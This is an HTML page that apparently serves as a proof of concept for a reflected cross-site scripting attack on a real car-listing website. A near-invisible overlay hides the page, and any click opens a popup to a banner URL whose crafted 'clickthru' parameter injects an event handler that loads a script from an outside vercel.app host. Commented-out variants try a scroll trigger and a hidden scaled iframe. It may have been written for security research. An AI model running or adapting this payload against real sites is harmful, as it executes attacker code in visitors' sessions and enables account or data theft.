<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <style>
        html, body {
            height: 200vh;
        }
        body {
            margin: 0;
            overflow: hidden;
        }
        iframe {
            position: absolute;
            left: 0;
            top: 0;
            width: 298px;
            height: 94px;
            scale: 999;
        }
        overlay {
            display: block;
            width: 100%;
            height: 100%;
            background: rgba(255, 255, 255, 0.999999);
            position: absolute;
            left: 0;
            top: 0;
            z-index: 999;
            pointer-events: none;
        }
    </style>
</head>
<body>
<overlay></overlay>
<script>
    window.addEventListener(
        "message",
        (event) => {
            console.log(event);
        },
        false,
    );

    document.addEventListener('click', (e) => {
        const x = e.x - (e.x / 2);
        const y = e.y - (e.y / 2);
        const popup = window.open(
            'https://www.sauto.cz/bannerova-reklama?perPage=4&banner=1&clickthru=/%22onmouseover=%22let%20s%20=%20document.createElement(%27script%27);%20s.setAttribute(%27src%27,%27https://whitehat-email-cz.vercel.app/index.js%27);%20document.head.appendChild(s)',
            '_blank',
            "height=600, width=300, resizable=0, scrollbars=0, status=0, titlebar=0, toolbar=0, location=0, menubar=0, left=" + x + ", top=" + y
        );
        popup.focus();
    });
    // alert('Hi');

    // confirm('test');
    // document.addEventListener('scroll', () => {
    //     window.open('https://www.sauto.cz/bannerova-reklama?perPage=1&banner=1&clickthru=/%22onmouseover=%22let%20s%20=%20document.createElement(%27script%27);%20s.setAttribute(%27src%27,%27https://whitehat-email-cz.vercel.app/index.js%27);%20document.head.appendChild(s)');
    // });


    // const src = "https://www.sauto.cz/bannerova-reklama?perPage=1&banner=1&clickthru=/%22onmouseover=%22let%20s%20=%20document.createElement(%27script%27);%20s.setAttribute(%27src%27,%27https://whitehat-email-cz.vercel.app/index.js%27);%20document.head.appendChild(s)";
    // const iframe = document.createElement("iframe");
    // iframe.setAttribute("scrolling", "no");
    // iframe.src = src;
    // iframe.setAttribute("frameborder", "0");
    // document.body.appendChild(iframe);
</script>
</body>
</html>